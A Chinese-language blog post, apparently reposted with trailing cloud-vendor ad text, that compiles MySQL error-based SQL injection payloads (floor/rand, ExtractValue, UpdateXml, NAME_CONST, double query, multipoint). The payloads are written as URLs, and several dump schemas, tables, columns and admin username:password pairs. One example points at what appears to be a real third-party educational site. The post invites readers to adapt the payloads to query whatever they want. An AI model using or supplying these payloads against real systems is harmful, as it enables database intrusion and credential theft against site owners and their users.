標籤:having show value select token 串連資料庫 限制 ase group by
1、通過floor暴錯
/*資料庫版本*/
SQLhttp://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)/*串連使用者*/
SQLhttp://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)/*串連資料庫*/
SQLhttp://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)/*暴庫*/
SQLhttp://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)/*暴表*/
SQLhttp://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)/*暴欄位*/
SQLhttp://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)/*暴內容*/
SQLhttp://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)2、ExtractValue(有長度限制,最長32位)
SQLhttp://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))3、UpdateXml(有長度限制,最長32位)
SQLhttp://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)4、NAME_CONST(適用於低版本)
SQLhttp://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--5、Error based Double Query Injection (http://www.vaibs.in/error-based-double-query-injection/)
/*資料庫版本*/
SQLhttp://www.hackblog.cn/sql.php?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 16、Multipoint(新方法)
/*資料庫版本*/
SQLhttp://www.hackblog.cn/sql.php?id=1 and 1=(select multipoint((select * from(select * from(select version())f)x)))
大家自己找關鍵字替換自己想要查詢的東西。
本文由Hack Blog原創,如需轉載註明原文連結http://www.hackblog.cn/post/36.html
MYSQL報錯注入方法整理
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
